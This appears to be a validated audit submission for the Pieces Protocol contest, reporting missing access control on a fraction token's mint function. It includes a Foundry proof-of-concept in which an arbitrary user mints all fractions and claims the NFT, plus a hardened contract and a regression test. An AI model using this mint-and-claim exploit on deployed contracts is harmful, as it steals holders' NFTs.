Pieces Protocol

First Flight #32
Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: high
Valid

Missing access control for minting ERC20ToGenerateNftFraccion

Summary

The ERC20ToGenerateNftFraccion contract mints the ERC20 tokens that serve as fractions of each NFT divided through the protocol. For every NFT that comes in, a new instance is deployed and used to track how many pieces of that NFT each user holds.

Fractions are created through its mint function. The vulnerability is that mint has no access control: it is callable by any address, not only by TokenDivider. Any user can therefore mint themselves the full fraction supply of a divided NFT and immediately call claimNft on TokenDivider to take the underlying NFT, at any time and without ever holding a legitimate fraction. This lets anyone steal divided NFTs and makes the protocol useless.

PoC

The following Foundry test lives in the protocol's test suite; USER, USER2, AMOUNT, TOKEN_ID, erc721Mock and tokenDivider are the fixtures set up in setUp().

```solidity
function testAnyoneCanMintERC20s() public {
    // USER, the NFT owner, divides TOKEN_ID into AMOUNT fractions.
    vm.startPrank(USER);
    erc721Mock.approve(address(tokenDivider), TOKEN_ID);
    tokenDivider.divideNft(address(erc721Mock), TOKEN_ID, AMOUNT);
    // Look up the fraction token that TokenDivider deployed for this NFT.
    ERC20Mock erc20Mock = ERC20Mock(tokenDivider.getErc20InfoFromNft(address(erc721Mock)).erc20Address);
    console.log("ERC20 Token address is: ", address(erc20Mock));
    vm.stopPrank();

    // USER2 never received a fraction, but mint() has no access control:
    // USER2 mints the full supply and claims the NFT.
    vm.startPrank(USER2);
    ERC20ToGenerateNftFraccion(address(erc20Mock)).mint(USER2, AMOUNT);
    tokenDivider.claimNft(address(erc721Mock));
    vm.stopPrank();

    // The NFT now belongs to USER2, who paid nothing for it.
    assertEq(erc721Mock.ownerOf(TOKEN_ID), USER2);
}
```

Impact

Critical: any address can take any NFT that has been divided through the protocol, and legitimate fraction holders are left with tokens that no longer back anything. This defeats the whole purpose of the protocol.

Tools Used

Manual Review

Recommendations

Restrict mint to TokenDivider: record the TokenDivider address in the fraction contract and add a modifier that reverts when msg.sender is any other address. Then add a regression test in which a non-divider address calls mint and the call is expected to revert.
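One way to apply that recommendation, written here as an added illustration and not the project's own contract. It assumes an OpenZeppelin ERC20 base, a constructor taking only a name and symbol, and that TokenDivider is the contract that deploys each fraction token (so msg.sender in the constructor is the divider); the actual constructor of ERC20ToGenerateNftFraccion is not shown on this page, so those parts are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

/// @notice Fraction token whose supply can only be created by TokenDivider.
/// Illustrative hardened version; constructor shape and deployer assumption are
/// not taken from the audited code.
contract ERC20ToGenerateNftFraccion is ERC20 {
    /// @dev The only address allowed to mint. Immutable: it cannot be
    /// re-pointed later, which removes a second place for the check to fail.
    address public immutable tokenDivider;

    error NotTokenDivider(address caller);

    /// @dev Reverts unless the caller is the TokenDivider that deployed this token.
    modifier onlyTokenDivider() {
        if (msg.sender != tokenDivider) revert NotTokenDivider(msg.sender);
        _;
    }

    constructor(string memory name_, string memory symbol_) ERC20(name_, symbol_) {
        // Assumption: TokenDivider deploys this contract inside divideNft,
        // so the deployer is the divider. If deployment happens elsewhere,
        // pass the divider address in explicitly instead.
        tokenDivider = msg.sender;
    }

    /// @notice Mints `amount` fractions to `to`. Previously callable by anyone;
    /// now only TokenDivider can create supply, so a user cannot mint the
    /// fractions needed to pass claimNft's balance check.
    function mint(address to, uint256 amount) external onlyTokenDivider {
        _mint(to, amount);
    }
}
```

With this in place, the PoC above becomes the regression test: put vm.expectRevert(abi.encodeWithSelector(ERC20ToGenerateNftFraccion.NotTokenDivider.selector, USER2)) immediately before USER2's mint call and the test passes only when the call reverts. If the fraction contract also exposes a burn function that TokenDivider relies on, it needs the same modifier, since an unrestricted burn lets anyone destroy another holder's fractions.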

Updates

Lead Judging Commences

fishy Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Lack of token access control checks

Any person can mint the ERC20 token generated in representation of the NFT
